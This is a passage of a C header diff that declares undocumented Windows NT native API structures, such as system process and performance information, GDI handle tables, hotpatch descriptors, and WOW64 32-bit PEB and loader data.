*PMEMORY_BASIC_INFORMATION; + +#endif /*_WINNT_*/ + +typedef struct _SYSTEM_PROCESSOR_POWER_INFORMATION { + UCHAR CurrentFrequency; + UCHAR ThermalLimitFrequency; + UCHAR ConstantThrottleFrequency; + UCHAR DegradedThrottleFrequency; + UCHAR LastBusyFrequency; + UCHAR LastC3Frequency; + UCHAR LastAdjustedBusyFrequency; + UCHAR ProcessorMinThrottle; + UCHAR ProcessorMaxThrottle; + ULONG NumberOfFrequencies; + ULONG PromotionCount; + ULONG DemotionCount; + ULONG ErrorCount; + ULONG RetryCount; + ULONG64 CurrentFrequencyTime; + ULONG64 CurrentProcessorTime; + ULONG64 CurrentProcessorIdleTime; + ULONG64 LastProcessorTime; + ULONG64 LastProcessorIdleTime; +} SYSTEM_PROCESSOR_POWER_INFORMATION, *PSYSTEM_PROCESSOR_POWER_INFORMATION; + +typedef struct _SYSTEM_QUERY_TIME_ADJUST_INFORMATION { + ULONG TimeAdjustment; + ULONG TimeIncrement; + BOOLEAN Enable; +} SYSTEM_QUERY_TIME_ADJUST_INFORMATION, *PSYSTEM_QUERY_TIME_ADJUST_INFORMATION; + +typedef struct _SYSTEM_SET_TIME_ADJUST_INFORMATION { + ULONG TimeAdjustment; + BOOLEAN Enable; +} SYSTEM_SET_TIME_ADJUST_INFORMATION, *PSYSTEM_SET_TIME_ADJUST_INFORMATION; + +typedef struct _SYSTEM_PERFORMANCE_INFORMATION { + LARGE_INTEGER IdleProcessTime; + LARGE_INTEGER IoReadTransferCount; + LARGE_INTEGER IoWriteTransferCount; + LARGE_INTEGER IoOtherTransferCount; + ULONG IoReadOperationCount; + ULONG IoWriteOperationCount; + ULONG IoOtherOperationCount; + ULONG AvailablePages; + SYSINF_PAGE_COUNT CommittedPages; + SYSINF_PAGE_COUNT CommitLimit; + SYSINF_PAGE_COUNT PeakCommitment; + ULONG PageFaultCount; + ULONG CopyOnWriteCount; + ULONG TransitionCount; + ULONG CacheTransitionCount; + ULONG DemandZeroCount; + ULONG PageReadCount; + ULONG PageReadIoCount; + ULONG CacheReadCount; + ULONG CacheIoCount; + ULONG DirtyPagesWriteCount; + ULONG DirtyWriteIoCount; + ULONG MappedPagesWriteCount; + ULONG MappedWriteIoCount; + ULONG PagedPoolPages; + ULONG NonPagedPoolPages; + ULONG PagedPoolAllocs; + ULONG PagedPoolFrees; + ULONG NonPagedPoolAllocs; + ULONG NonPagedPoolFrees; + ULONG FreeSystemPtes; + ULONG ResidentSystemCodePage; + ULONG TotalSystemDriverPages; + ULONG TotalSystemCodePages; + ULONG NonPagedPoolLookasideHits; + ULONG PagedPoolLookasideHits; + ULONG AvailablePagedPoolPages; + ULONG ResidentSystemCachePage; + ULONG ResidentPagedPoolPage; + ULONG ResidentSystemDriverPage; + ULONG CcFastReadNoWait; + ULONG CcFastReadWait; + ULONG CcFastReadResourceMiss; + ULONG CcFastReadNotPossible; + ULONG CcFastMdlReadNoWait; + ULONG CcFastMdlReadWait; + ULONG CcFastMdlReadResourceMiss; + ULONG CcFastMdlReadNotPossible; + ULONG CcMapDataNoWait; + ULONG CcMapDataWait; + ULONG CcMapDataNoWaitMiss; + ULONG CcMapDataWaitMiss; + ULONG CcPinMappedDataCount; + ULONG CcPinReadNoWait; + ULONG CcPinReadWait; + ULONG CcPinReadNoWaitMiss; + ULONG CcPinReadWaitMiss; + ULONG CcCopyReadNoWait; + ULONG CcCopyReadWait; + ULONG CcCopyReadNoWaitMiss; + ULONG CcCopyReadWaitMiss; + ULONG CcMdlReadNoWait; + ULONG CcMdlReadWait; + ULONG CcMdlReadNoWaitMiss; + ULONG CcMdlReadWaitMiss; + ULONG CcReadAheadIos; + ULONG CcLazyWriteIos; + ULONG CcLazyWritePages; + ULONG CcDataFlushes; + ULONG CcDataPages; + ULONG ContextSwitches; + ULONG FirstLevelTbFills; + ULONG SecondLevelTbFills; + ULONG SystemCalls; +} SYSTEM_PERFORMANCE_INFORMATION, *PSYSTEM_PERFORMANCE_INFORMATION; + +typedef struct _SYSTEM_PROCESS_INFORMATION { + ULONG NextEntryOffset; + ULONG NumberOfThreads; + LARGE_INTEGER SpareLi1; + LARGE_INTEGER SpareLi2; + LARGE_INTEGER SpareLi3; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ImageName; + KPRIORITY BasePriority; + HANDLE UniqueProcessId; + HANDLE InheritedFromUniqueProcessId; + ULONG HandleCount; + ULONG SessionId; + ULONG_PTR PageDirectoryBase; + SIZE_T PeakVirtualSize; + SIZE_T VirtualSize; + ULONG PageFaultCount; + SIZE_T PeakWorkingSetSize; + SIZE_T WorkingSetSize; + SIZE_T QuotaPeakPagedPoolUsage; + SIZE_T QuotaPagedPoolUsage; + SIZE_T QuotaPeakNonPagedPoolUsage; + SIZE_T QuotaNonPagedPoolUsage; + SIZE_T PagefileUsage; + SIZE_T PeakPagefileUsage; + SIZE_T PrivatePageCount; + LARGE_INTEGER ReadOperationCount; + LARGE_INTEGER WriteOperationCount; + LARGE_INTEGER OtherOperationCount; + LARGE_INTEGER ReadTransferCount; + LARGE_INTEGER WriteTransferCount; + LARGE_INTEGER OtherTransferCount; +} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; + +typedef struct _SYSTEM_SESSION_PROCESS_INFORMATION { + ULONG SessionId; + ULONG SizeOfBuf; + PVOID Buffer; +} SYSTEM_SESSION_PROCESS_INFORMATION, *PSYSTEM_SESSION_PROCESS_INFORMATION; + +typedef struct _SYSTEM_MEMORY_INFO { + PUCHAR StringOffset; + USHORT ValidCount; + USHORT TransitionCount; + USHORT ModifiedCount; + USHORT PageTableCount; +} SYSTEM_MEMORY_INFO, *PSYSTEM_MEMORY_INFO; + +typedef struct _SYSTEM_MEMORY_INFORMATION { + ULONG InfoSize; + ULONG_PTR StringStart; + SYSTEM_MEMORY_INFO Memory[ 1 ]; +} SYSTEM_MEMORY_INFORMATION, *PSYSTEM_MEMORY_INFORMATION; + +typedef struct _SYSTEM_CALL_COUNT_INFORMATION { + ULONG Length; + ULONG NumberOfTables; +} SYSTEM_CALL_COUNT_INFORMATION, *PSYSTEM_CALL_COUNT_INFORMATION; + +typedef struct _SYSTEM_DEVICE_INFORMATION { + ULONG NumberOfDisks; + ULONG NumberOfFloppies; + ULONG NumberOfCdRoms; + ULONG NumberOfTapes; + ULONG NumberOfSerialPorts; + ULONG NumberOfParallelPorts; +} SYSTEM_DEVICE_INFORMATION, *PSYSTEM_DEVICE_INFORMATION; + +typedef struct _SYSTEM_FLAGS_INFORMATION { + ULONG Flags; +} SYSTEM_FLAGS_INFORMATION, *PSYSTEM_FLAGS_INFORMATION; + +typedef struct _SYSTEM_CALL_TIME_INFORMATION { + ULONG Length; + ULONG TotalCalls; + LARGE_INTEGER TimeOfCalls[1]; +} SYSTEM_CALL_TIME_INFORMATION, *PSYSTEM_CALL_TIME_INFORMATION; + +typedef struct _SYSTEM_OBJECT_INFORMATION { + ULONG NextEntryOffset; + PVOID Object; + HANDLE CreatorUniqueProcess; + USHORT CreatorBackTraceIndex; + USHORT Flags; + LONG PointerCount; + LONG HandleCount; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + HANDLE ExclusiveProcessId; + PVOID SecurityDescriptor; + OBJECT_NAME_INFORMATION NameInfo; +} SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION; + +typedef struct _SYSTEM_PAGEFILE_INFORMATION { + ULONG NextEntryOffset; + ULONG TotalSize; + ULONG TotalInUse; + ULONG PeakUsage; + UNICODE_STRING PageFileName; +} SYSTEM_PAGEFILE_INFORMATION, *PSYSTEM_PAGEFILE_INFORMATION; + +typedef struct _SYSTEM_VERIFIER_INFORMATION { + ULONG NextEntryOffset; + ULONG Level; + UNICODE_STRING DriverName; + + ULONG RaiseIrqls; + ULONG AcquireSpinLocks; + ULONG SynchronizeExecutions; + ULONG AllocationsAttempted; + + ULONG AllocationsSucceeded; + ULONG AllocationsSucceededSpecialPool; + ULONG AllocationsWithNoTag; + ULONG TrimRequests; + + ULONG Trims; + ULONG AllocationsFailed; + ULONG AllocationsFailedDeliberately; + ULONG Loads; + + ULONG Unloads; + ULONG UnTrackedPool; + ULONG CurrentPagedPoolAllocations; + ULONG CurrentNonPagedPoolAllocations; + + ULONG PeakPagedPoolAllocations; + ULONG PeakNonPagedPoolAllocations; + + SIZE_T PagedPoolUsageInBytes; + SIZE_T NonPagedPoolUsageInBytes; + SIZE_T PeakPagedPoolUsageInBytes; + SIZE_T PeakNonPagedPoolUsageInBytes; + +} SYSTEM_VERIFIER_INFORMATION, *PSYSTEM_VERIFIER_INFORMATION; + +typedef struct _SYSTEM_VERIFIER_INFORMATION_EX +{ + ULONG VerifyMode; + ULONG OptionChanges; + UNICODE_STRING PreviousBucketName; + ULONG Reserved[ 4 ]; +} SYSTEM_VERIFIER_INFORMATION_EX, *PSYSTEM_VERIFIER_INFORMATION_EX; + +#define MM_WORKING_SET_MAX_HARD_ENABLE 0x1 +#define MM_WORKING_SET_MAX_HARD_DISABLE 0x2 +#define MM_WORKING_SET_MIN_HARD_ENABLE 0x4 +#define MM_WORKING_SET_MIN_HARD_DISABLE 0x8 + +typedef struct _SYSTEM_FILECACHE_INFORMATION { + SIZE_T CurrentSize; + SIZE_T PeakSize; + ULONG PageFaultCount; + SIZE_T MinimumWorkingSet; + SIZE_T MaximumWorkingSet; + SIZE_T CurrentSizeIncludingTransitionInPages; + SIZE_T PeakSizeIncludingTransitionInPages; + ULONG TransitionRePurposeCount; + ULONG Flags; +} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; + +#define FLG_HOTPATCH_KERNEL 0x80000000 +#define FLG_HOTPATCH_RELOAD_NTDLL 0x40000000 +#define FLG_HOTPATCH_NAME_INFO 0x20000000 +#define FLG_HOTPATCH_RENAME_INFO 0x10000000 +#define FLG_HOTPATCH_MAP_ATOMIC_SWAP 0x08000000 +#define FLG_HOTPATCH_WOW64 0x04000000 + +#define FLG_HOTPATCH_ACTIVE 0x00000001 +#define FLG_HOTPATCH_STATUS_FLAGS FLG_HOTPATCH_ACTIVE + +#define FLG_HOTPATCH_VERIFICATION_ERROR 0x00800000 + +typedef struct _HOTPATCH_HOOK_DESCRIPTOR +{ + ULONG_PTR TargetAddress; + PVOID MappedAddress; + ULONG CodeOffset; + ULONG CodeSize; + ULONG OrigCodeOffset; + ULONG ValidationOffset; + ULONG ValidationSize; +} HOTPATCH_HOOK_DESCRIPTOR, *PHOTPATCH_HOOK_DESCRIPTOR; + +typedef struct _SYSTEM_HOTPATCH_CODE_INFORMATION { + + ULONG Flags; + ULONG InfoSize; + + union + { + struct + { + ULONG DescriptorsCount; + HOTPATCH_HOOK_DESCRIPTOR CodeDescriptors[1]; // variable size structure + } CodeInfo; + + struct + { + USHORT NameOffset; + USHORT NameLength; + } KernelInfo; + + struct + { + USHORT NameOffset; + USHORT NameLength; + USHORT TargetNameOffset; + USHORT TargetNameLength; + } UserModeInfo; + + struct + { + HANDLE FileHandle1; + PIO_STATUS_BLOCK IoStatusBlock1; + PFILE_RENAME_INFORMATION RenameInformation1; + ULONG RenameInformationLength1; + HANDLE FileHandle2; + PIO_STATUS_BLOCK IoStatusBlock2; + PFILE_RENAME_INFORMATION RenameInformation2; + ULONG RenameInformationLength2; + } RenameInfo; + + struct + { + HANDLE ParentDirectory; + HANDLE ObjectHandle1; + HANDLE ObjectHandle2; + } AtomicSwap; + }; + +} SYSTEM_HOTPATCH_CODE_INFORMATION, *PSYSTEM_HOTPATCH_CODE_INFORMATION; + +typedef struct _KERNEL_USER_TIMES { + LARGE_INTEGER CreateTime; + LARGE_INTEGER ExitTime; + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; +} KERNEL_USER_TIMES; +typedef KERNEL_USER_TIMES *PKERNEL_USER_TIMES; + +typedef enum _WATCHDOG_HANDLER_ACTION +{ + WdActionSetTimeoutValue, + WdActionQueryTimeoutValue, + WdActionResetTimer, + WdActionStopTimer, + WdActionStartTimer, + WdActionSetTriggerAction, + WdActionQueryTriggerAction, + WdActionQueryState, + WdActionSleep, + WdActionWake +} WATCHDOG_HANDLER_ACTION; + +typedef enum _WATCHDOG_INFORMATION_CLASS { + WdInfoTimeoutValue, + WdInfoResetTimer, + WdInfoStopTimer, + WdInfoStartTimer, + WdInfoTriggerAction, + WdInfoState +} WATCHDOG_INFORMATION_CLASS; + +typedef + NTSTATUS + (*PWD_HANDLER)( + IN WATCHDOG_HANDLER_ACTION Action, + IN PVOID Context, + IN OUT PULONG DataValue, + IN BOOLEAN NoLocks + ); + +typedef struct _SYSTEM_WATCHDOG_HANDLER_INFORMATION { + PWD_HANDLER WdHandler; + PVOID Context; +} SYSTEM_WATCHDOG_HANDLER_INFORMATION, *PSYSTEM_WATCHDOG_HANDLER_INFORMATION; + +#define WDSTATE_FIRED 0x00000001 +#define WDSTATE_HARDWARE_ENABLED 0x00000002 +#define WDSTATE_STARTED 0x00000004 +#define WDSTATE_HARDWARE_PRESENT 0x00000008 + +typedef struct _SYSTEM_WATCHDOG_TIMER_INFORMATION { + WATCHDOG_INFORMATION_CLASS WdInfoClass; + ULONG DataValue; +} SYSTEM_WATCHDOG_TIMER_INFORMATION, *PSYSTEM_WATCHDOG_TIMER_INFORMATION; + +#define GDI_MAX_HANDLE_COUNT 0x4000 + +#define GDI_HANDLE_INDEX_SHIFT 0 +#define GDI_HANDLE_INDEX_BITS 16 +#define GDI_HANDLE_INDEX_MASK 0xffff + +#define GDI_HANDLE_TYPE_SHIFT 16 +#define GDI_HANDLE_TYPE_BITS 5 +#define GDI_HANDLE_TYPE_MASK 0x1f + +#define GDI_HANDLE_ALTTYPE_SHIFT 21 +#define GDI_HANDLE_ALTTYPE_BITS 2 +#define GDI_HANDLE_ALTTYPE_MASK 0x3 + +#define GDI_HANDLE_STOCK_SHIFT 23 +#define GDI_HANDLE_STOCK_BITS 1 +#define GDI_HANDLE_STOCK_MASK 0x1 + +#define GDI_HANDLE_UNIQUE_SHIFT 24 +#define GDI_HANDLE_UNIQUE_BITS 8 +#define GDI_HANDLE_UNIQUE_MASK 0xff + +#define GDI_HANDLE_INDEX(Handle) ((ULONG)(Handle) & GDI_HANDLE_INDEX_MASK) +#define GDI_HANDLE_TYPE(Handle) (((ULONG)(Handle) >> GDI_HANDLE_TYPE_SHIFT) & GDI_HANDLE_TYPE_MASK) +#define GDI_HANDLE_ALTTYPE(Handle) (((ULONG)(Handle) >> GDI_HANDLE_ALTTYPE_SHIFT) & GDI_HANDLE_ALTTYPE_MASK) +#define GDI_HANDLE_STOCK(Handle) (((ULONG)(Handle) >> GDI_HANDLE_STOCK_SHIFT)) & GDI_HANDLE_STOCK_MASK) + +#define GDI_MAKE_HANDLE(Index, Unique) ((ULONG)(((ULONG)(Unique) << GDI_HANDLE_INDEX_BITS) | (ULONG)(Index))) + +// GDI server-side types + +#define GDI_DEF_TYPE 0 +#define GDI_DC_TYPE 1 +#define GDI_DD_DIRECTDRAW_TYPE 2 +#define GDI_DD_SURFACE_TYPE 3 +#define GDI_RGN_TYPE 4 +#define GDI_SURF_TYPE 5 +#define GDI_CLIENTOBJ_TYPE 6 +#define GDI_PATH_TYPE 7 +#define GDI_PAL_TYPE 8 +#define GDI_ICMLCS_TYPE 9 +#define GDI_LFONT_TYPE 10 +#define GDI_RFONT_TYPE 11 +#define GDI_PFE_TYPE 12 +#define GDI_PFT_TYPE 13 +#define GDI_ICMCXF_TYPE 14 +#define GDI_ICMDLL_TYPE 15 +#define GDI_BRUSH_TYPE 16 +#define GDI_PFF_TYPE 17 // unused +#define GDI_CACHE_TYPE 18 // unused +#define GDI_SPACE_TYPE 19 +#define GDI_DBRUSH_TYPE 20 // unused +#define GDI_META_TYPE 21 +#define GDI_EFSTATE_TYPE 22 +#define GDI_BMFD_TYPE 23 // unused +#define GDI_VTFD_TYPE 24 // unused +#define GDI_TTFD_TYPE 25 // unused +#define GDI_RC_TYPE 26 // unused +#define GDI_TEMP_TYPE 27 // unused +#define GDI_DRVOBJ_TYPE 28 +#define GDI_DCIOBJ_TYPE 29 // unused +#define GDI_SPOOL_TYPE 30 + +// GDI client-side types + +#define GDI_CLIENT_TYPE_FROM_HANDLE(Handle) ((ULONG)(Handle) & ((GDI_HANDLE_ALTTYPE_MASK << GDI_HANDLE_ALTTYPE_SHIFT) | \ + (GDI_HANDLE_TYPE_MASK << GDI_HANDLE_TYPE_SHIFT))) +#define GDI_CLIENT_TYPE_FROM_UNIQUE(Unique) GDI_CLIENT_TYPE_FROM_HANDLE((ULONG)(Unique) << 16) + +#define GDI_ALTTYPE_1 (1 << GDI_HANDLE_ALTTYPE_SHIFT) +#define GDI_ALTTYPE_2 (2 << GDI_HANDLE_ALTTYPE_SHIFT) +#define GDI_ALTTYPE_3 (3 << GDI_HANDLE_ALTTYPE_SHIFT) + +#define GDI_CLIENT_BITMAP_TYPE (GDI_SURF_TYPE << GDI_HANDLE_TYPE_SHIFT) +#define GDI_CLIENT_BRUSH_TYPE (GDI_BRUSH_TYPE << GDI_HANDLE_TYPE_SHIFT) +#define GDI_CLIENT_CLIENTOBJ_TYPE (GDI_CLIENTOBJ_TYPE << GDI_HANDLE_TYPE_SHIFT) +#define GDI_CLIENT_DC_TYPE (GDI_DC_TYPE << GDI_HANDLE_TYPE_SHIFT) +#define GDI_CLIENT_FONT_TYPE (GDI_LFONT_TYPE << GDI_HANDLE_TYPE_SHIFT) +#define GDI_CLIENT_PALETTE_TYPE (GDI_PAL_TYPE << GDI_HANDLE_TYPE_SHIFT) +#define GDI_CLIENT_REGION_TYPE (GDI_RGN_TYPE << GDI_HANDLE_TYPE_SHIFT) + +#define GDI_CLIENT_ALTDC_TYPE (GDI_CLIENT_DC_TYPE | GDI_ALTTYPE_1) +#define GDI_CLIENT_DIBSECTION_TYPE (GDI_CLIENT_BITMAP_TYPE | GDI_ALTTYPE_1) +#define GDI_CLIENT_EXTPEN_TYPE (GDI_CLIENT_BRUSH_TYPE | GDI_ALTTYPE_2) +#define GDI_CLIENT_METADC16_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_3) +#define GDI_CLIENT_METAFILE_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_2) +#define GDI_CLIENT_METAFILE16_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_1) +#define GDI_CLIENT_PEN_TYPE (GDI_CLIENT_BRUSH_TYPE | GDI_ALTTYPE_1) + +typedef struct _GDI_HANDLE_ENTRY +{ + union + { + PVOID Object; + PVOID NextFree; + }; + union + { + struct + { + USHORT ProcessId; + USHORT Lock : 1; + USHORT Count : 15; + }; + ULONG Value; + } Owner; + USHORT Unique; + UCHAR Type; + UCHAR Flags; + PVOID UserPointer; +} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; + +typedef struct _GDI_SHARED_MEMORY +{ + GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; +} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; + +#define FLS_MAXIMUM_AVAILABLE 128 +#define TLS_MINIMUM_AVAILABLE 64 +#define TLS_EXPANSION_SLOTS 1024 + +#define DOS_MAX_COMPONENT_LENGTH 255 +#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5) + +typedef struct _CURDIR +{ + UNICODE_STRING DosPath; + HANDLE Handle; +} CURDIR, *PCURDIR; + +#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002 +#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 + +typedef struct _RTL_DRIVE_LETTER_CURDIR +{ + USHORT Flags; + USHORT Length; + ULONG TimeStamp; + STRING DosPath; +} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; + +#define RTL_MAX_DRIVE_LETTERS 32 +#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 + +typedef struct _RTL_USER_PROCESS_PARAMETERS +{ + ULONG MaximumLength; + ULONG Length; + + ULONG Flags; + ULONG DebugFlags; + + HANDLE ConsoleHandle; + ULONG ConsoleFlags; + HANDLE StandardInput; + HANDLE StandardOutput; + HANDLE StandardError; + + CURDIR CurrentDirectory; + UNICODE_STRING DllPath; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; + PVOID Environment; + + ULONG StartingX; + ULONG StartingY; + ULONG CountX; + ULONG CountY; + ULONG CountCharsX; + ULONG CountCharsY; + ULONG FillAttribute; + + ULONG WindowFlags; + ULONG ShowWindowFlags; + UNICODE_STRING WindowTitle; + UNICODE_STRING DesktopInfo; + UNICODE_STRING ShellInfo; + UNICODE_STRING RuntimeData; + RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; + + ULONG EnvironmentSize; + ULONG EnvironmentVersion; +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +#define WOW64_SYSTEM_DIRECTORY "SysWOW64" +#define WOW64_SYSTEM_DIRECTORY_U L"SysWOW64" +#define WOW64_X86_TAG " (x86)" +#define WOW64_X86_TAG_U L" (x86)" + +typedef enum _WOW64_SHARED_INFORMATION +{ + SharedNtdll32LdrInitializeThunk = 0, + SharedNtdll32KiUserExceptionDispatcher = 1, + SharedNtdll32KiUserApcDispatcher = 2, + SharedNtdll32KiUserCallbackDispatcher = 3, + SharedNtdll32LdrHotPatchRoutine = 4, + SharedNtdll32ExpInterlockedPopEntrySListFault = 5, + SharedNtdll32ExpInterlockedPopEntrySListResume = 6, + SharedNtdll32ExpInterlockedPopEntrySListEnd = 7, + SharedNtdll32RtlUserThreadStart = 8, + SharedNtdll32pQueryProcessDebugInformationRemote = 9, + SharedNtdll32EtwpNotificationThread = 10, + SharedNtdll32BaseAddress = 11, + Wow64SharedPageEntriesCount = 12 +} WOW64_SHARED_INFORMATION; + +// 21.12.2011 added +#define SET_LAST_STATUS(S)NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(NtCurrentTeb()->LastStatusValue = (ULONG)(S)) +// 21.12.2011 - end + +// 32-bit definitions + +#if (_MSC_VER < 1300) && !defined(_WINDOWS_) +typedef struct LIST_ENTRY32 { + DWORD Flink; + DWORD Blink; +} LIST_ENTRY32; +typedef LIST_ENTRY32 *PLIST_ENTRY32; + +typedef struct LIST_ENTRY64 { + ULONGLONG Flink; + ULONGLONG Blink; +} LIST_ENTRY64; +typedef LIST_ENTRY64 *PLIST_ENTRY64; +#endif + +#define WOW64_POINTER(Type) ULONG + +typedef struct _PEB_LDR_DATA32 +{ + ULONG Length; + BOOLEAN Initialized; + WOW64_POINTER(HANDLE) SsHandle; + LIST_ENTRY32 InLoadOrderModuleList; + LIST_ENTRY32 InMemoryOrderModuleList; + LIST_ENTRY32 InInitializationOrderModuleList; + WOW64_POINTER(PVOID) EntryInProgress; + BOOLEAN ShutdownInProgress; + WOW64_POINTER(HANDLE) ShutdownThreadId; +} PEB_LDR_DATA32, *PPEB_LDR_DATA32; + +#define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks ) + +typedef struct _LDR_DATA_TABLE_ENTRY32 +{ + LIST_ENTRY32 InLoadOrderLinks; + LIST_ENTRY32 InMemoryOrderLinks; + LIST_ENTRY32 InInitializationOrderLinks; + WOW64_POINTER(PVOID) DllBase; + WOW64_POINTER(PVOID) EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING32 FullDllName; + UNICODE_STRING32 BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; + union + { + LIST_ENTRY32 HashLinks; + struct + { + WOW64_POINTER(PVOID) SectionPointer; + ULONG CheckSum; + }; + }; + union + { + ULONG TimeDateStamp; + WOW64_POINTER(PVOID) LoadedImports; + }; + WOW64_POINTER(PVOID) EntryPointActivationContext; + WOW64_POINTER(PVOID) PatchInformation; + LIST_ENTRY32 ForwarderLinks; + LIST_ENTRY32 ServiceTagLinks; + LIST_ENTRY32 StaticLinks; + WOW64_POINTER(PVOID) ContextInformation; + WOW64_POINTER(ULONG_PTR) OriginalBase; + LARGE_INTEGER LoadTime; +} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32; + +typedef struct _CURDIR32 +{ + UNICODE_STRING32 DosPath; + WOW64_POINTER(HANDLE) Handle; +} CURDIR32, *PCURDIR32; + +typedef struct _RTL_DRIVE_LETTER_CURDIR32 +{ + USHORT Flags; + USHORT Length; + ULONG TimeStamp; + STRING32 DosPath; +} RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32; + +typedef struct _RTL_USER_PROCESS_PARAMETERS32 +{ + ULONG MaximumLength; + ULONG Length; + + ULONG Flags; + ULONG DebugFlags; + + WOW64_POINTER(HANDLE) ConsoleHandle; + ULONG ConsoleFlags; + WOW64_POINTER(HANDLE) StandardInput; + WOW64_POINTER(HANDLE) StandardOutput; + WOW64_POINTER(HANDLE) StandardError; + + CURDIR32 CurrentDirectory; + UNICODE_STRING32 DllPath; + UNICODE_STRING32 ImagePathName; + UNICODE_STRING32 CommandLine; + WOW64_POINTER(PVOID) Environment; + + ULONG StartingX; + ULONG StartingY; + ULONG CountX; + ULONG CountY; + ULONG CountCharsX; + ULONG CountCharsY; + ULONG FillAttribute; + + ULONG WindowFlags; + ULONG ShowWindowFlags; + UNICODE_STRING32 WindowTitle; + UNICODE_STRING32 DesktopInfo; + UNICODE_STRING32 ShellInfo; + UNICODE_STRING32 RuntimeData; + RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; + + ULONG EnvironmentSize; + ULONG EnvironmentVersion; +} RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32; + +typedef struct _PEB32 +{ + BOOLEAN InheritedAddressSpace; + BOOLEAN ReadImageFileExecOptions; + BOOLEAN BeingDebugged; + union + { + BOOLEAN BitField; + struct + { + BOOLEAN ImageUsesLargePages : 1; + BOOLEAN IsProtectedProcess : 1; + BOOLEAN IsLegacyProcess : 1; + BOOLEAN IsImageDynamicallyRelocated : 1; + BOOLEAN SkipPatchingUser32Forwarders : 1; + BOOLEAN SpareBits : 3; + }; + }; + WOW64_POINTER(HANDLE) Mutant; + + WOW64_POINTER(PVOID) ImageBaseAddress; + WOW64_POINTER(PPEB_LDR_DATA) Ldr; + WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters; + WOW64_POINTER(PVOID) SubSystemData; + WOW64_POINTER(PVOID) ProcessHeap; + WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock; + WOW64_POINTER(PVOID) AtlThunkSListPtr; + WOW64_POINTER(PVOID) IFEOKey; + union + { + ULONG CrossProcessFlags; + struct + { + ULONG ProcessInJob : 1; + ULONG ProcessInitializing : 1; + ULONG ProcessUsingVEH : 1; + ULONG ProcessUsingVCH : 1; + ULONG ProcessUsingFTH : 1; + ULONG ReservedBits0 : 27; + }; + ULONG EnvironmentUpdateCount; + }; + union + { + WOW64_POINTER(PVOID) KernelCallbackTable; + WOW64_POINTER(PVOID) UserSharedInfoPtr; + }; + ULONG SystemReserved[1]; + ULONG AtlThunkSListPtr32; + WOW64_POINTER(PVOID) ApiSetMap; + ULONG TlsExpansionCounter; + WOW64_POINTER(PVOID) TlsBitmap; + ULONG TlsBitmapBits[2]; + WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase; + WOW64_POINTER(PVOID) HotpatchInformation; + WOW64_POINTER(PPVOID) ReadOnlyStaticServerData; + WOW64_POINTER(PVOID) AnsiCodePageData; + WOW64_POINTER(PVOID) OemCodePageData; + WOW64_POINTER(PVOID) UnicodeCaseTableData; + + ULONG NumberOfProcessors; + ULONG NtGlobalFlag; + + LARGE_INTEGER CriticalSectionTimeout; + WOW64_POINTER(SIZE_T) HeapSegmentReserve; + WOW64_POINTER(SIZE_T) HeapSegmentCommit; + WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold; + WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold; + + ULONG NumberOfHeaps; + ULONG MaximumNumberOfHeaps; + WOW64_POINTER(PPVOID) ProcessHeaps; + + WOW64_POINTER(PVOID) GdiSharedHandleTable; + WOW64_POINTER(PVOID) ProcessStarterHelper; + ULONG GdiDCAttributeList; + + WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock; + + ULONG OSMajorVersion; + ULONG OSMinorVersion; + USHORT OSBuildNumber; + USHORT OSCSDVersion; + ULONG OSPlatformId; + ULONG ImageSubsystem; + ULONG ImageSubsystemMajorVersion; + ULONG ImageSubsystemMinorVersion; + WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask; + GDI_HANDLE_BUFFER32 GdiHandleBuffer; + WOW64_POINTER(PVOID) PostProcessInitRoutine; + + WOW64_POINTER(PVOID) TlsExpansionBitmap; + ULONG TlsExpansionBitmapBits[32]; + + ULONG SessionId; + + // Rest of structure not included. +} PEB32, *PPEB32; + +#define GDI_BATCH_BUFFER_SIZE 310 + +typedef struct _GDI_TEB_BATCH32 +{ + ULONG Offset; + WOW64_POINTER(ULONG_PTR) HDC; + ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; +} GDI_TEB_BATCH32, *PGDI_TEB_BATCH32; + +#if (_MSC_VER < 1300) && !defined(_WINDOWS_) +// +// 32 and 64 bit specific version for wow64 and the debugger +// +typedef struct _NT_TIB32 { + DWORD ExceptionList; + DWORD StackBase; + DWORD 